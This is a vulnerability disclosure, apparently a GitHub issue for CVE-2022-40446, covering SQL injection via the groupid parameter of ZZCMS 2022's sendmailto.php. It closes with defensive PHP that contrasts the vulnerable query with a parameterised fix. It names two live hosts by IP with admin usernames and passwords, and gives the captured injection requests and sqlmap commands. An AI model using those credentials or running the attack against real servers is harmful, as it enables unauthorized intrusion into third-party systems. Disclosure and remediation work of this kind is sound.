CVE-2022-40446: ZZCMS2022 is vulnerable to SQL injection · Issue #4 · liong007/ZZCMS
ZZCMS 2022 was discovered to contain a SQL injection vulnerability via the component /admin/sendmailto.php?tomail=&groupid=.
**Exploit Title:** ZZCMS2022 is vulnerable to SQL injection
Google Dork: ZZCMS
Software Link:
https://github.com/liong007/ZZCMS/releases/download/ZZCMS2022/zzcms2022.zip
http://www.zzcms.net/download/zzcms2022.zip
Version: ZZCMS 2022
**Tested on:** Windows Server 2008, Ubuntu
Attack vector(s):
ZZCMS is a content management system (CMS) developed by China's zzcms team.
ZZCMS2022 is vulnerable to SQL injection via /admin/sendmailto.php?tomail=&groupid=.
Vendor Homepage: http://www.zzcms.net/about/6.html
Immediately after deployment, the version string reads “powered by zzcms2021”.
The next day it is automatically upgraded to “powered by zzcms2022”.
Affected pages:
All pages that contain page “/admin/sendmailto.php?tomail=&groupid=”
For example:
An IP address in China is required to access the hosts below.
Case 1:
Login http://119.28.176.129/admin
User: admin
Password: 123456
1) Click “发E-mail” (Send E-mail), then click “发送” (Send). The page returns the error “select email from zzcms_user where groupid=1 order by id asc limit 0,2完成”.
The condition variable in the SELECT statement is not protected by single quotation marks, which can lead to SQL injection vulnerabilities.
2) Capture the request to view the SQL injection point:
```
GET /admin/sendmailto.php?tomail=&groupid=1&subject=&mailbody=&Submit=%E5%8F%91%E9%80%81 HTTP/1.1
Host: 119.28.176.129
```
3) Scan with sqlmap:
```
sqlmap.py -r sql2022.txt
```
The contents of sql2022.txt are as follows:
Sqlmap scan results:
Case 2:
Login http://175.6.210.20:81/admin
User: admin
Password: 123456789qwe
1) Click “发E-mail” (Send E-mail), then click “发送” (Send). The page returns the error “select email from zzcms_user where groupid=1 order by id asc limit 0,2”.
The condition variable in the SELECT statement is not protected by single quotation marks, which can lead to SQL injection vulnerabilities.
2) Capture the request to view the SQL injection point:
```
GET /admin/sendmailto.php?tomail=&groupid=1&subject=&mailbody=&Submit=%E5%8F%91%E9%80%81 HTTP/1.1
Host: 175.6.210.20:81
```
3) Scan with sqlmap:
```
sqlmap.py -r sql2022-2.txt
```
The contents of sql2022-2.txt are as follows:
Sqlmap scan results:
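As an added illustration (not ZZCMS's own source, which this report does not reproduce), here is the unquoted query pattern echoed in the error messages of both cases beside a hardened form that validates `groupid` and binds it as an integer parameter. The table, column and `LIMIT` clause come from the quoted statement; the function names, the mysqli connection and the request-handler glue are assumptions.

```php
<?php
// Added example, not ZZCMS source. Table, column and LIMIT clause are taken from
// the statement echoed in the report's error message; everything else is assumed.

// Vulnerable pattern: the request value is interpolated directly into the WHERE
// clause without quoting, so a non-integer groupid alters the query structure.
function fetch_group_emails_unsafe(mysqli $db, string $groupid): array
{
    $sql = "select email from zzcms_user where groupid=$groupid order by id asc limit 0,2";
    $emails = [];
    $result = $db->query($sql);
    while ($row = $result->fetch_assoc()) {
        $emails[] = $row['email'];
    }
    return $emails;
}

// Hardened form: reject anything that is not a plain non-negative integer before
// it reaches the database, then bind it as an integer parameter so the value can
// never be parsed as part of the SQL text.
function fetch_group_emails_safe(mysqli $db, string $groupid): array
{
    if (!ctype_digit($groupid)) {
        throw new InvalidArgumentException('groupid must be a non-negative integer');
    }
    $gid = (int) $groupid;

    $stmt = $db->prepare(
        'SELECT email FROM zzcms_user WHERE groupid = ? ORDER BY id ASC LIMIT 0, 2'
    );
    $stmt->bind_param('i', $gid);
    $stmt->execute();

    $emails = [];
    $result = $stmt->get_result(); // requires the mysqlnd driver
    while ($row = $result->fetch_assoc()) {
        $emails[] = $row['email'];
    }
    $stmt->close();
    return $emails;
}

// Assumed request-handler glue: the parameter arrives via GET exactly as in the
// captured request above; validation failures become a 400 instead of a query.
$db = new mysqli('localhost', 'DB_USER_PLACEHOLDER', 'DB_PASS_PLACEHOLDER', 'DB_NAME_PLACEHOLDER');
$db->set_charset('utf8mb4');
try {
    $emails = fetch_group_emails_safe($db, $_GET['groupid'] ?? '');
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    exit('invalid groupid');
}
```

The `ctype_digit` check and the `'i'` bind type are independent defences: either one alone stops the unquoted-integer injection described here, and keeping both also gives a clear 400 response to log and alert on.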